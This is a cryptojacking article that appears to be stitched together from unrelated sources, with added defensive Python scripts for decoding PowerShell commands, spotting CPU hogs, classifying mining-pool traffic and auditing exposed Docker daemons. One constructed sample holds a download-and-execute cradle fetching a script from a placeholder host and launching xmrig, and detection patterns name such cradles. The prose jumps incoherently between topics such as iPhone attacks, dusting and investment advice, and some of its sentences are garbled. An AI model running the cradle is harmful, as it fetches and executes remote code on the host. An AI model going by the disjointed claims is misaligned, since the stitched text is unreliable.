Clever cryptojackers like BadShell hide inside legitimate processes such as Windows PowerShell and use them to run their mining scripts. Few traditional antivirus programs detect this, because they tend to trust signed Windows executables like PowerShell by default and judge the binary rather than what it has been told to execute.
Advanced fileless miners do their work entirely in a computer's memory, again abusing legitimate tools like PowerShell, so there is no mining binary on disk for a scanner to find. In proof-of-work mining, once other nodes have verified a miner's solution, the network accepts the block as legitimate and the miner who found it collects the reward. In the campaigns described here, cryptocurrency mined on infected systems was sent to two wallets owned by the operators.
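As an added example (not code from the original page or from any vendor quoted on it), the Python script below shows how a defender can look through the PowerShell command lines that a process-creation log records, decode any -EncodedCommand payload (Base64 over UTF-16LE, the encoding PowerShell actually uses, accepted under any unambiguous prefix such as -e or -enc) and check the decoded script for mining indicators. The command lines, the pool hostname, the download URL and the wallet address are all constructed for the example; the example.invalid names are placeholders, not real infrastructure.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample standing in for a fileless miner's launcher script.
# The pool, URL and wallet are placeholders, not real indicators.
_MINER_PLAINTEXT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1'); "
    "Start-Process xmrig.exe -ArgumentList '-o stratum+tcp://pool.example.invalid:3333 "
    "-u 4A" + ("7Qx9" * 24)[:93] + " -p x'"
)


def _encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand is Base64 over the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines as a process-creation log (Sysmon Event 1 / 4688) would record them.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -NoProfile -WindowStyle Hidden -enc " + _encode_ps(_MINER_PLAINTEXT),
    "powershell.exe -e " + _encode_ps("Get-Date | Out-File C:\\temp\\date.txt"),
]

INDICATORS = {
    "stratum_url": re.compile(r"stratum\+(?:tcp|ssl)://", re.I),
    "known_miner": re.compile(r"\b(?:xmrig|minerd|cpuminer|nbminer|lolminer|t-rex)\b", re.I),
    # Monero standard addresses are 95 Base58 characters beginning with 4.
    "monero_address": re.compile(r"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b"),
    # Not mining-specific, but the usual way a fileless miner is pulled into memory.
    "download_cradle": re.compile(r"\b(?:IEX|Invoke-Expression|DownloadString)\b", re.I),
}

# A flag token followed by a long Base64 run; the flag is checked against "encodedcommand" below.
_ENCODED_FLAG = re.compile(r"(?<!\S)[-/](\w+)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> Optional[Dict[str, str]]:
    """Find an -EncodedCommand argument (any unambiguous prefix of the flag name)
    and return {"blob": <base64>, "decoded": <script>}, or None if there is none."""
    for m in _ENCODED_FLAG.finditer(cmdline):
        flag = m.group(1).lower()
        if not (flag.startswith("e") and "encodedcommand".startswith(flag)):
            continue  # e.g. -ExecutionPolicy is not a prefix of encodedcommand
        try:
            decoded = base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # not Base64/UTF-16LE after all
        return {"blob": m.group(2), "decoded": decoded}
    return None


def analyze_command_line(cmdline: str) -> Dict[str, object]:
    """Scan the visible command line plus the decoded payload for mining indicators.
    The Base64 blob itself is masked so random Base58-looking runs in it cannot match."""
    enc = decode_encoded_command(cmdline)
    visible = cmdline if enc is None else cmdline.replace(enc["blob"], "<encoded>")
    decoded = "" if enc is None else enc["decoded"]
    hits: List[str] = sorted(
        name for name, rx in INDICATORS.items() if rx.search(visible) or rx.search(decoded)
    )
    return {"encoded": enc is not None, "decoded": decoded, "indicators": hits}


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = analyze_command_line(line)
        print(f"encoded={result['encoded']!s:5} indicators={result['indicators']}")
```

The reason to decode rather than keyword-match the raw command line is that every indicator lives inside the Base64 blob, which is exactly why trusting the signed powershell.exe binary misses it. The third sample shows the converse: an encoded command on its own proves nothing, so the verdict rests on what the decoded script does.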
It is still unknown who was behind the attacks on the iPhones of at least nine people involved in Ugandan diplomacy. The FBI has warned that the gang uses a variety of tools and malware to carry out high-volume attacks on critical sectors. Graboid, by contrast, was only observed operating for about three months before its Docker Hub images were removed.
All About Cryptojacking
Commonly referred to as “malicious cryptomining”, cryptojacking occurs when cybercriminals hijack other people’s computers and use them to mine cryptocurrency. Symantec points out that the increase in the last quarter coincided with a surge in the value of Bitcoin and Monero, two cryptocurrencies often mined by threat actors who rely on browser-based cryptojacking malware. Compromised credentials are also used to access cloud services and harness those resources for mining. While any computer can technically mine, powerful systems are required to be competitive, because proof-of-work mining is a race to find a hash below a target that the network sets: the work is brute-force hashing, not breaking encryption. Many miners race for the same block, but only the one that finds it receives the reward, so there is a strong incentive to gather as much processing power as possible and hash faster.
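To make the processing-power argument concrete, here is a toy proof-of-work in Python, added as an illustration and not taken from any real coin's code base. It uses Bitcoin's double-SHA-256 construction with a simplified leading-zero-bits target; the header bytes are constructed for the example. Finding a valid nonce takes on average 2^difficulty hashes, while checking one takes a single hash, which is the asymmetry a cryptojacker exploits: the victim pays for the expensive half.

```python
import hashlib


def block_hash(header: bytes, nonce: int) -> bytes:
    """Bitcoin-style double SHA-256 over header || nonce (nonce as 8-byte little-endian)."""
    data = header + nonce.to_bytes(8, "little")
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def meets_target(digest: bytes, difficulty_bits: int) -> bool:
    """Valid when the hash, read as a 256-bit integer, is below 2^(256 - difficulty_bits),
    i.e. its first `difficulty_bits` bits are all zero."""
    return int.from_bytes(digest, "big") < (1 << (256 - difficulty_bits))


def mine(header: bytes, difficulty_bits: int, max_nonce: int = 1 << 32):
    """Try nonces 0, 1, 2, ... until one satisfies the target.
    Returns (nonce, attempts). Each attempt costs one hash and nothing but brute force helps."""
    for nonce in range(max_nonce):
        if meets_target(block_hash(header, nonce), difficulty_bits):
            return nonce, nonce + 1
    raise RuntimeError("exhausted nonce space; a real miner would change the header and retry")


def verify(header: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Verification is a single hash: cheap for every node, however long mining took."""
    return meets_target(block_hash(header, nonce), difficulty_bits)


def expected_attempts(difficulty_bits: int) -> int:
    """Each hash succeeds with probability 2^-difficulty_bits, so the mean is 2^difficulty_bits."""
    return 1 << difficulty_bits


def seconds_per_block(hashes_per_second: float, difficulty_bits: int) -> float:
    """Expected time to find a block at a given hash rate."""
    return expected_attempts(difficulty_bits) / hashes_per_second


if __name__ == "__main__":
    header = b"constructed header: prev-hash|merkle-root|timestamp"
    nonce, attempts = mine(header, 16)
    print(f"nonce={nonce} after {attempts} hashes (expected about {expected_attempts(16)})")
    print("verified by a single hash:", verify(header, nonce, 16))
    # Why an attacker wants thousands of machines: same difficulty, three orders of magnitude apart.
    for rate in (1e3, 1e6):
        print(f"{rate:.0e} H/s -> {seconds_per_block(rate, 32) / 3600:.1f} hours per block at 32 bits")
```

Real networks retune the target so that blocks arrive at a fixed interval regardless of total hash rate, which is why the reward per machine shrinks as more miners join and why stolen compute is the only way to raise a share without paying for it.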
With browser-based cryptojacking, a threat actor can forgo wide infection campaigns and the need to infect myriad devices. Instead they compromise a few web servers and reach untold numbers of site visitors. It is better to prevent an attack than to stop one already under way; but if you suspect you have picked up cryptojacking malware, the first thing to do is remove it from your device.
Cryptojacking is a type of cyberattack in which a hacker co-opts a target’s computing power to illicitly mine cryptocurrency on the hacker’s behalf. The new coins and transaction fees are deposited in wallets owned by the attacker, while the costs of mining, including electricity and wear and tear on the hardware, are borne by the victim.
How do I know if I have malware mining?
The first symptom you will notice is that your computer becomes sluggish. Mining needs a great deal of computing power and keeps the CPU (or GPU) saturated, so everything else has to compete for it; once a miner has attached itself to your system, expect it to run far slower than its hardware should allow.
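A practitioner would measure this symptom rather than guess at it. The Python function below, added here as an example and not taken from the original page, takes periodic per-process CPU samples (constructed values standing in for what ps or top would report) and flags processes that stay above a threshold for several consecutive samples. That separates a miner, which never lets go of the CPU, from a legitimate burst such as a page load or a compile.

```python
from typing import Dict, List, Tuple

# Constructed CPU samples taken 30 s apart: (timestamp, {pid: (command, cpu_percent)}).
# Illustrative values only, not captured from a real host; "update-helper" is a made-up name
# chosen to look innocuous, the way miners are usually named.
Snapshot = Tuple[float, Dict[int, Tuple[str, float]]]
SAMPLE_SNAPSHOTS: List[Snapshot] = [
    (0.0,  {1201: ("firefox", 35.0), 1340: ("kworker/u8:2", 2.0), 2044: ("update-helper", 97.5)}),
    (30.0, {1201: ("firefox", 88.0), 1340: ("kworker/u8:2", 1.0), 2044: ("update-helper", 99.0)}),
    (60.0, {1201: ("firefox", 12.0), 1340: ("kworker/u8:2", 3.0), 2044: ("update-helper", 98.2)}),
    (90.0, {1201: ("firefox", 9.0),  1340: ("kworker/u8:2", 2.0), 2044: ("update-helper", 97.9)}),
]


def sustained_hogs(snapshots: List[Snapshot], threshold: float = 90.0,
                   min_consecutive: int = 3) -> Dict[int, Dict[str, object]]:
    """Return {pid: {command, since, samples, peak}} for every process whose CPU usage
    stayed at or above `threshold` for at least `min_consecutive` consecutive samples.
    A single sample below the threshold, or the process disappearing, resets its run."""
    runs: Dict[int, Dict[str, object]] = {}
    flagged: Dict[int, Dict[str, object]] = {}
    for ts, procs in sorted(snapshots, key=lambda s: s[0]):
        # End the run of anything that exited or dropped below the threshold this interval.
        for pid in list(runs):
            if pid not in procs or procs[pid][1] < threshold:
                del runs[pid]
        for pid, (command, cpu) in procs.items():
            if cpu < threshold:
                continue
            run = runs.setdefault(pid, {"command": command, "since": ts, "samples": 0, "peak": 0.0})
            run["samples"] = int(run["samples"]) + 1
            run["peak"] = max(float(run["peak"]), cpu)
            if int(run["samples"]) >= min_consecutive:
                flagged[pid] = dict(run)  # keep the latest view of the run
    return flagged


def report(flagged: Dict[int, Dict[str, object]]) -> List[str]:
    """One line per flagged process, ready for a ticket or an alert."""
    return [
        f"pid {pid} ({r['command']}): >= threshold for {r['samples']} samples since t={r['since']}, "
        f"peak {r['peak']}%"
        for pid, r in sorted(flagged.items())
    ]


if __name__ == "__main__":
    for line in report(sustained_hogs(SAMPLE_SNAPSHOTS)):
        print(line)
```

Some miners throttle themselves to stay under the radar; for those, lower the threshold and lengthen the window (for instance 40% over eight samples), since the tell is persistence rather than peak load. Firefox in the sample spikes once and is correctly ignored at either setting.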
The malware still uses infected Facebook accounts to deliver malicious links, but it can also steal web accounts and credentials, which lets it inject cryptojacking code into the victims’ web pages. Cryptojacking can even infect Android mobile devices, using the same methods that target desktops, or users’ phones can be redirected to an infected site that leaves a persistent pop-under window running the miner.
A blockchain is essentially a digital ledger of transactions that is duplicated and distributed across the entire network of computers participating in it. It retains a detailed history of every transaction, which is what prevents the same coins from being spent twice. In lieu of oversight by a government or central bank, cryptocurrency relies on a distributed ledger, most commonly a blockchain: a system of recording information that uses cryptographic hashing, digital signatures and timestamping to make past records very difficult to alter. “The malicious request […] exhibits several similarities,” Unit 42 noted. “It’s the same attack pattern delivering the same cpuminer payload against the same industry, suggesting it’s likely the same perpetrator behind the cryptojacking operation.” A new report explores the methods cybercriminals discuss most when looking to steal or mine cryptocurrency.
The same research, released by RWTH Aachen University in Germany, concludes that Monero accounts for 75 percent of all browser-based cryptocurrency mining. Like ransomware, cryptominers are not new; malware that uses ordinary computers to mine bitcoin without specialized or powerful hardware has been around since at least 2011.
Protection Against Cryptomining Attacks
This novel attack, which is emerging both in the literature and in the wild, has proved very effective given how simple it is to run a crypto-client on a target device. Several countermeasures have recently been proposed, with different features and performance, but all share a host-based architecture. Designed to protect the individual user, they are not well suited to efficiently protecting a corporate network, especially against insiders. In this paper, we propose a network-based approach to detect and identify crypto-client activity by relying solely on network traffic, even when it is encrypted and mixed with benign traces. First, we provide a detailed analysis of real network traces generated by three major cryptocurrencies, Bitcoin, Monero and Bytecoin, considering both normal traffic and traffic shaped by a VPN.
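The network-based approach described above can be illustrated with a small flow classifier, added here as an example rather than taken from the paper. It inspects the start of each TCP payload for the two pool protocols most miners speak: Stratum v1 (JSON-RPC methods such as mining.subscribe) and the CryptoNote-style login protocol that XMRig uses. The flows, IP addresses, wallet placeholder and agent string are constructed. Where the payload is encrypted (stratum+ssl, or the VPN case the paper considers), only the weak port-based signal survives, which is why egress restrictions toward known pools still matter.

```python
import json
from typing import List, Optional, Tuple

# Stratum v1 methods seen at the start of a miner's conversation with a pool.
STRATUM_V1_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.notify", "mining.set_difficulty", "mining.extranonce.subscribe",
}
# Ports pools conventionally listen on. Weak evidence on its own: miners can use 443 too.
COMMON_POOL_PORTS = {3333, 4444, 5555, 7777, 8888, 9999, 14444, 45700}

# Constructed flows: the first bytes of each TCP stream. Not real captures; addresses are
# documentation ranges and WALLET_ADDRESS stands in for a real address.
SAMPLE_FLOWS = [
    {"dst": "203.0.113.10", "dport": 3333,
     "payload": b'{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}\n'},
    {"dst": "198.51.100.7", "dport": 443,  # pool protocol on 443: port alone would miss it
     "payload": b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"WALLET_ADDRESS",'
                b'"pass":"x","agent":"XMRig/6.16.4","algo":["rx/0"]}}\n'},
    {"dst": "192.0.2.8", "dport": 80,
     "payload": b"GET /index.html HTTP/1.1\r\nHost: www.example.invalid\r\n\r\n"},
    {"dst": "10.0.0.5", "dport": 8545,  # ordinary JSON-RPC, not a mining protocol
     "payload": b'{"jsonrpc":"2.0","method":"eth_blockNumber","params":[],"id":1}\n'},
    {"dst": "203.0.113.20", "dport": 4444,  # TLS ClientHello: payload is opaque
     "payload": b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"},
]


def _json_messages(payload: bytes) -> List[dict]:
    """Both pool protocols are newline-delimited JSON objects; return the ones that parse."""
    out: List[dict] = []
    for line in payload.decode("utf-8", errors="ignore").splitlines():
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            msg = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(msg, dict):
            out.append(msg)
    return out


def classify_flow(flow: dict) -> Tuple[Optional[str], str]:
    """Return (verdict, evidence). Verdicts: 'stratum_v1', 'cryptonote_pool',
    'suspicious_port_only' (weak, payload unreadable) or None."""
    for msg in _json_messages(flow["payload"]):
        method = msg.get("method")
        params = msg.get("params")
        if method in STRATUM_V1_METHODS:
            return "stratum_v1", f"JSON-RPC method {method}"
        if method == "login" and isinstance(params, dict) and {"login", "pass"} <= params.keys():
            return "cryptonote_pool", f"pool login by {params.get('agent', 'unknown agent')}"
        if method == "submit" and isinstance(params, dict) and {"job_id", "nonce", "result"} <= params.keys():
            return "cryptonote_pool", "share submission"
    if flow["dport"] in COMMON_POOL_PORTS:
        return "suspicious_port_only", f"unreadable payload to common pool port {flow['dport']}"
    return None, ""


def summarize(flows: List[dict]) -> List[str]:
    """One line per flow that drew a verdict, for an analyst's queue."""
    lines = []
    for f in flows:
        verdict, evidence = classify_flow(f)
        if verdict:
            lines.append(f"{f['dst']}:{f['dport']} -> {verdict} ({evidence})")
    return lines


if __name__ == "__main__":
    for line in summarize(SAMPLE_FLOWS):
        print(line)
```

The Ethereum JSON-RPC flow is left alone on purpose: matching on "JSON-RPC to an odd port" alone would page on every blockchain node in the estate, so the classifier keys on the mining-specific methods and on the login shape (login, pass, agent) that pool clients send.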
“We’ve seen attacks on enterprise servers and also on cloud infrastructure. We’ve seen all kinds of customers being affected by this.” Servers hijacked for cryptocurrency mining can mean higher bills from your cloud provider or your power utility. CoffeeMiner uses a man-in-the-middle attack against users connecting to WiFi hotspots and injects mining code into every HTML page they request.
Cryptocurrencies work in a similar way, but with a decentralized database. The best way to mitigate a dusting attack is to generate a new wallet address for every transaction; if you are really blockchain savvy, some wallets let you mark received funds so that you avoid spending the “dust” in later transactions. Clipboard address-swapping, by contrast, is a fairly simple attack to mitigate if you always double-check that the pasted wallet address matches the one you copied.
How To Protect Yourself Against Cryptojacking
Cryptocurrency “dusting” deanonymizes a crypto wallet by sending tiny amounts of crypto “dust” to many wallets. Threat actors then monitor those wallets’ transactions and correlate the different addresses on the blockchain to uncover the identity of the entity behind each wallet. The malware is also capable of using scanning tools to identify other exposed Docker daemon APIs in order to expand its cryptojacking operations further.
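Graboid and similar worms find victims by scanning for Docker daemons exposed over plain TCP. The Python audit below, added as an example and not part of the original page or of Docker itself, reads the daemon's listener configuration (daemon.json "hosts" and any -H flags on a systemd ExecStart line, both constructed here) and reports a tcp://0.0.0.0:2375 listener without tlsverify as critical, since anyone who can reach it can start a container with the host's resources. The hardened configuration shown alongside binds to one address on 2376 and requires client certificates.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Constructed configurations; not taken from any real host.
WEAK_DAEMON_JSON: Dict = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
}
HARDENED_DAEMON_JSON: Dict = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}
# The same weakness expressed on dockerd's command line instead of daemon.json.
WEAK_EXECSTART = "/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 --containerd=/run/containerd/containerd.sock"

_HOST_FLAG = re.compile(r"(?:-H|--host)(?:=|\s+)(\S+)")


def hosts_from_execstart(execstart: str) -> List[str]:
    """Listener URLs passed to dockerd via -H / --host on a systemd ExecStart= line."""
    return _HOST_FLAG.findall(execstart)


def audit_docker_listeners(daemon_json: Dict, execstart: str = "") -> List[Tuple[str, str]]:
    """Return (severity, message) findings for network-reachable daemon listeners."""
    hosts = list(daemon_json.get("hosts", [])) + hosts_from_execstart(execstart)
    # "tls": true only encrypts the connection; "tlsverify": true is what demands a
    # client certificate, so only tlsverify counts as authentication here.
    tls_verify = bool(daemon_json.get("tlsverify")) or "--tlsverify" in execstart.split()
    findings: List[Tuple[str, str]] = []
    for h in hosts:
        u = urlparse(h)
        if u.scheme != "tcp":
            continue  # unix:// and fd:// are reachable only from the host itself
        if not tls_verify:
            findings.append(("critical", f"{h}: TCP listener without tlsverify; any client that can "
                                         f"reach it gets root-equivalent control of the host"))
        if u.hostname in (None, "", "0.0.0.0", "::"):
            findings.append(("high", f"{h}: bound to all interfaces"))
        if u.port == 2375 and tls_verify:
            findings.append(("low", f"{h}: TLS served on the conventional plaintext port 2375; "
                                    f"2376 is the convention for TLS"))
    return findings


if __name__ == "__main__":
    for label, cfg, exe in (("weak daemon.json", WEAK_DAEMON_JSON, ""),
                            ("weak ExecStart", {}, WEAK_EXECSTART),
                            ("hardened", HARDENED_DAEMON_JSON, "")):
        print(label, audit_docker_listeners(cfg, exe) or "no findings")
```

Two caveats a practitioner would add: dockerd refuses to start when "hosts" is set both in daemon.json and as a -H flag, so in practice only one of the two sources is live on a given machine, and a daemon that is only meant to be used locally should not have a tcp:// listener at all.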
- Whether attackers use malware, a browser-based drive-by download or a Trojan, your defenses need to cover all three routes into cryptojacking.
- It’s extremely hard to stop this type of attack once it has started.
- Don’t rejoice just yet: browser-based cryptojacking may see a resurgence in the near future due to the recent and sharp drop in the Monero hash rate, which lowers the mining difficulty and makes each hijacked browser more profitable.
- X-Force data from late 2018 and early 2019 showed that browser-based cryptojacking attacks are on the decline while also revealing a notable increase in malware-based attacks.
- The miner then runs its code on your device, using its processing power to compute “hashes” for the attacker.
Cryptojacked or not, an overheating device is a sign that something is wrong, so find out why sooner rather than later. Watch for reduced and erratic performance, especially while using undemanding software: checking email or scrolling through a spreadsheet should not make a modern personal computer struggle, so if it does, investigate further. “There’s a lot of room for growth and evolution,” says Marc Laliberte, threat analyst at network security solutions provider WatchGuard Technologies. Information security awareness education and training are of paramount importance in combatting cryptojacking.
How Cybercriminals Execute Cryptojacking Attacks Today
Is cryptocurrency safe?
Investing in crypto assets is risky but also potentially extremely profitable. Cryptocurrency is a good investment if you want to gain direct exposure to the demand for digital currency, while a safer but potentially less lucrative alternative is to buy the stocks of companies with exposure to cryptocurrency.
If you’ve used the same antivirus software for a long time, you may want to check the latest reviews and compare your options.
If that registry value is present and well-formed, the mining configuration stored in it takes precedence; otherwise the malware falls back to the default configuration embedded in the binary. A web application firewall should be able to spot or prevent the insertion of malicious mining code into served pages. In one 2020 case, a student at Louisiana State University confessed to having taken control of 169 university computers and used them to mine crypto.
- Whether you’ve been cryptojacked locally on your system, or through the browser, it can be difficult to manually detect the intrusion after the fact.
- Next-generation antivirus products such as Cylance will block known mining software from executing on a device, even when, as the author found, he was deliberately mining ETH with the dual GPUs in his personal desktop.
- In 2018, cryptojackers targeted the operational technology network of a European water utility control system, seriously impacting the operators’ ability to manage the utility plant.
- The malicious server relays these credentials and 2FA code to the real login page on the real server.
- Since its initial discovery, the malware has not been active, which signals a possible reinforcement and weaponization of the malware for a large-scale attack.
The attack is a prime example of cryptojacking, which is when attackers leverage malicious cryptomining for financial profit. They do so by hacking into devices to install software, which then uses the devices’ power and resources to mine cryptocurrency or to steal cryptocurrency wallets owned by the victims. The decentralized, pseudonymous nature of cryptocurrencies means there is no regulating body that decides how much of the currency to release into circulation; issuance is fixed by the protocol. At first, anyone with a computer could mine cryptocurrency, but it quickly turned into an arms race. Today, most miners use powerful, purpose-built computers that mine cryptocurrency around the clock.
Charles DeBeck is a senior cyber threat intelligence strategic analyst with IBM X-Force Incident Response and Intelligence Services. Restrict outbound connections to known cryptomining pools to help detect and prevent cryptomining within the organization’s environments. Malicious mining via compromised websites is also known as cryptojacking. Once a miner is identified, you can quarantine the malware or remove it altogether; but however advanced your antivirus, attackers keep getting smarter, so do not rely on it alone.
One type of smart contract vulnerability is integer overflow/underflow.
— ATEITIS (@ateitis_corp) November 29, 2021
You could also consider using a network or host monitoring tool that flags abnormal GPU/CPU usage. Cryptojacking is when an attacker gains unauthorized access to a device and uses it to power their cryptomining. By cryptojacking many machines, coinminers can hash faster and win more block rewards. The cryptojacked system, meanwhile, draws more power, and the mining slows its processing, sometimes to the point of failure. Cryptojacking combines a malware attack with exploitation of the co-opted computer’s resources.
Cryptojacking is a form of cyberattack in which hackers hijack a target’s computer to stealthily mine cryptocurrency without the user’s awareness. As striking as the intrusions into servers and utilities are, cryptojacking of personal devices remains the more prevalent problem, since stealing small amounts of compute from many devices adds up to large sums. In fact, criminals even seem to prefer cryptojacking to ransomware, as it potentially pays more money for less risk. You might think, “Why use my phone and its relatively minor processing power?” But when these attacks happen en masse, the sheer number of smartphones out there adds up to a collective strength worth the cryptojackers’ attention.
- Cryptojacking rarely results in any serious damage to the victim, beyond impaired performance, increased electric bills, and higher IT overhead costs as attempts are made to address performance issues.
- Unlike its very first C2 request message, the rest of the miner’s status report messages are actually clear text.
- Like all pyramid schemes, the ransomware business model works well… for the people on the top.
The modern cryptojacking attack does not focus solely on mining cryptocurrency. Instead, cybercriminals leverage their access to accomplish multiple goals, such as combining cryptojacking and data theft.
Author: Joanna Ossinger